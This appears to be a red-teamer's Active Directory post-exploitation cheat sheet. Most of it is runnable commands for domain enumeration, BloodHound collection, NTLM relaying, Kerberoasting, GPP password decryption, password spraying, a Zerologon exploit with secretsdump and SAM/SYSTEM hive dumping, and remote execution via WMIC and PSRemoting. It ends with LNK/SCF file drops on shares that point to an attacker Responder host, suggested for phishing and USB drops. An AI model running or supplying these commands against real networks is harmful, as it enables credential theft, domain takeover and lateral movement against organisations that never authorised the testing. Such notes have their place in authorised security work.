Skip to content

Basics on what to do upon getting shell/rce #

Note: Try as much as possible to Live off the land

Good blogs for these: #

Also keep these vulnerabilities that Microsoft Won't Fix in mind when performing domain enumeration.

Just basic stuff #

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
whoami /all
hostname
ipconfig /all
systeminfo
query user
qwinsta
gpresult /R 
dir
tree /f /a
tasklist /V
net user
net user /domain
net user <username>
net user <username> /domain
net localgroup
net localgroup administrators
net groups /domain
net group "<group>" /domain
net group "domain admins" /domain
klist

NLTest1 #

1
2
3
nltest /dclist:<domain>
nltest /dsgetdc:<domain>
nltest /domain_trusts /all_trusts

Powershell Enumeration1 #

1
2
3
4
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', '<domain>')))).GetAllTrustRelationships()

Tools for automating enumeration #

Dumping credentials #

Bloodhound (Sharphound)2 #

  1. On local machine (~Kali)

    • Bloodhound Installation19
    • Running bloodhound ingestor from linux: 
      1
2
3
4
5
      cd /opt
git clone https://github.com/fox-it/BloodHound.py
cd BloodHound.py
sudo docker run -v ${PWD}:/bloodhound-data -it bloodhound
# bloodhound-python -d domain.local -u user01 -p P@ssw0rd -c all,loggedon --zip

  2. Sharphound Officialy supported ingestors 34

    • Running the official/supported Sharphound Collectors collects more information [
      • although Bloodhound.py is quick and good for most cases
    • Running on the victim host 
      1
      .\SharpHound.exe -c all --encryptzip --nosavecache --zipfilename bh.zip -d domain.local
    • Runas
      • If logged in on a local user account but have domain user credentials, then on the command-line
      • This works also to get SharpHound to work and ingest data even if your own Windows VM is not part of the Domain.
        • This bypasses the need to run SharpHound on the host itself with AVs/ERDs 
          1
2
3
4
          C:\> runas /netonly /user:<DOMAIN>\<username> "powershell.exe -exec bypass"

# then on the spawned powershell
.\SharpHound.exe -c all --nosavecache --zipfilename bh.zip -d domain.local
    • Run after sharphound for some nice statistics
    • Mass import owned users in Bloodhound14
    • Bloodhound Custom Queries
    • Bloodhound attacks
      • GenericAll 15
        • Although the commands in the reference work, I found that it was easier to modify permissions and other actions (reset user password) using RSAT.
        • If you're Windows attacking VM is connected to the network, just run mmc as a domain user (provided you already have the domain user's credentials).

NTLM Relaying #

  • Basic NTLM Relay
    • Gather NTLM Relay list using crackmapexec
      • crackmapexec smb --gen-relay-list relay_list.txt company_internal_subnets.txt 
        1
2
        sudo impacket-ntlmrelayx -socks -smb2support -of output.txt -tf ./relay_list.txt -c ipconfig
sudo responder -I eth1 -Pvd

General Attack methods #

  • Methods 56
    • NTLM Relay18
    • Golden Ticket
      • Requires full domain compromise.
      • Used for persistenceand pivoting
    • Kerberoasting
      • Requires access as any user.
      • Use to escalateand pivot
    • Silver Ticket
      • Requires service hash.
      • Use for persistenceand escalation
    • Pass-the-Ticket
      • Requires access as user.
      • Use to pivot
    • Over-Pass-the-Hash
      • Requires access as user.
      • Use to pivot

Kerberoasting #

  1. From Linux 17

    • Beware of time difference of the attacking machine (Kali) and the targeted Domain Controller 
      1
      GetUserSPNs.py -debug -request -outputfile TGS_file.txt -dc-ip <DC_IP_Address> <FQDN>/<username>

  2. From Windows

    • PowerSploit 
      1
      Invoke-Kerberoast -Domain domain.com -OutputFormat hashcat
      • Getting SPN ticekts of from an external external forest
        • Works if there is trust towards the domain you are in 
          1
          Get-DomainSPNTicket <SERVICE>/DC01.domain-external.com@domain-external.com

Password Cracking * Refer to m0chan's blog 

1
hashcat64.exe -a 3 -m 13100 SPN.hash /wordlists/rockyou.txt

Gathering Windows GPP passwords8 #

  1. On target machine logged-on with a regular domain account 
    1
    findstr /S cpassword \\<domain_controller>\sysvol\*.xml
  2. On local machine (~Kali) 
    1
    gpp-decrypt <cpassword_value>

ADFind9 #

1
2
adfind.exe -f objectclass=trusteddomain
adfind.exe -sc trustdmp

ADRecon10 #

1
2
# On your own Windows VM after "runas" command
.\ADRecon.ps1 -Method LDAP -DomainControler dc01.acme.local -Credential ACME\user01

RSAT #

  • Run RSAT from a non-domain joined PC 
    1
2
    runas /netonly /user:<DOMAIN>\<username> "mmc /server=<DC or domain>"
runas /netonly /user:ACME\bob.normal.user "mmc /server=dc01.acme.local"

Domain Password Spraying #

Dafthack's DomainPasswordSpray11 #

  • Retrieves the list of domain users, sprays and attempts to detect lockout threshold of a user and stops spraying 
    1
2
    Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Spring2017

Find interesting Domain Share Files12 #

  • Find-InterestingDomainShareFile 
    1
    Find-InterestingDomainShareFile
  • Snaffler 
    1
2
    runas /netonly /user:domain.local\victim01 cmd.exe
snaffler.exe -s -o snaffler_.log
  • Crackmapexec
    • Also refer to this 
      1
      crackmapexec smb -d domain.local -u victim01 -p P@ssw0rd -M spider_plus

Direct Attacks to the Domain Controller #

Zerologon 1617 #

  • Resets machine account of vulnerable domain controller
    • Remember to restore the password after
1
2
3
4
5
python3 zerologon_tester.py dc02 10.10.10.20 # From securaBV

python3 cve-2020-1472-exploit.py dc02 10.10.10.20 # From dirkjanm

secretsdump.py -no-pass -just-dc acme.local/dc02\$@10.10.10.20 # From impacket
  • Password restoration process 
     1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
    wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe acme.local/[email protected]
cd Windows/temp
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

smbclient \\\\10.10.10.20\\c$ -U 'acme.local\\administrator%2b576acbe6bcfda7294d6bd18041b8fe' --pw-nt-hash
cd Windows/temp
get system.save
get security.save
get sam.save


wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe acme.local/[email protected]
cd Windows/temp
del system.save
del security.save
del sam.save


secretsdump.py -sam sam.save -system system.save -security security.save local

python3 restorepassword.py acme.local/dc02@dc02 -target-ip 10.10.10.20  -hexpass ef464f4194d9f401af41c9982dc7c85524cc9ed8adef4fe24c8044d13f1ae41c594131d2d46cab3a0d3384cda94baae65d5a87d26df1201ff6ff1697672ac4e16c16f0e514f6e54d84342c5af4193fe96329e3a30fb84c08845e7a289749225276c7c2e3181555fa5eef21d4d1ba23aba0f4706383327b299283f72b7df6b661cfb11189bd8b3ab552ffb99aa12ffe19b760e00e143ef3e776d8377da57925c5ed71aa9f0991acff7fc9c963addb8496fdd273f231e15a51d99f41a770de714573b26795c45a03eac80e3bb45ac5c100740da5814c3979e5349e8471623086c80f6160163f4bd56da3b75a6deb17b1020 # From dirkjanm

secretsdump.py -no-pass -just-dc acme.local/dc02\$@10.10.10.20

Pivoting #

Executing Commands Remotely #

PsExec #

Powershell Remote Session (PSRemote) #

  • "Usual" requirement is that you must be in the same subnet as the machine you are connecting to
  • Create a session
    • Without specified credentials 
      1
2
      New-PSSession dc01.domain.com
$s = New-PSSession dc01.domain.com
    • Create a session with credentials 
      1
2
      $cred = get-credential
New-PSSession dc01.domain.com Credential $cred
  • Run commands remotely via PSSession 
    1
    Invoke-Command -Session $s -FilePath C:\Temp\Rubeus.ps1
  • Interactive PSSession 
    1
    Enter-PSSession -Id <#>
  • Exit PSSession 
    1
    Remove-PSSession -Id <#>

Windows Remote Management #

1
winrs -r:DC01.domain.com cmd

WMIC #

  • Run a DLL file remotely using wmic via installutil15 
    1
    wmic /node:dc01.domain.com process call create "cmd.exe /c \windows\microsoft.net\framework64\v4.0.30319\installutil.exe /logfile= /u \temp\file.dll"

Creating lnk file in writable shares #

  • None opsec safe
  • In my experience, IT noticed randomly generated folder names (not necessarily a file)
  • Still good to be inserted in phishing email attachments and USB drops (combine with knary) 
    1
2
    crackmapexec smb /home/kali/Scope/writable_shares.txt -d domain.local -u user01 -p P@ssw0rd -M slinky -o SERVER=<ATTACKER_RESPONDER_IP> NAME=Microsoft_UpdateLnk
crackmapexec smb /home/kali/Scope/writable_shares.txt -d domain.local -u user01 -p P@ssw0rd -M scuffy -o SERVER=<ATTACKER_RESPONDER_IP> NAME=Microsoft_UpdateScf

  1. ired.team 

  2. hausec 

  3. Github - Bloodhound 

  4. ReadTheDocs - Bloodhound 

  5. Red Siege 

  6. Orange Cyberdefense 

  7. Tarlogic Security 

  8. Pure Security 

  9. Redcanary 

  10. Github - ADRecon 

  11. Guthub - DomainPasswordSpray 

  12. Readthedocs - Powersploit 

  13. Move Aside Script Kiddies–Malware Execution in the Age of Advanced Defenses | Joff Thyer 

  14. Github - Knavesec - Max 

  15. Bloodhound - GenericAll 

  16. Github - SecuraBV/CVE-2020-1472 

  17. Github - dirkjanm/CVE-2020-1472 

  18. TrustedSec - Comprehensive Guide on NTLM Relaying 2022 

  19. Readthedocs - Bloodhound 

  20. Twitter - mpgn 

Last update: April 28, 2022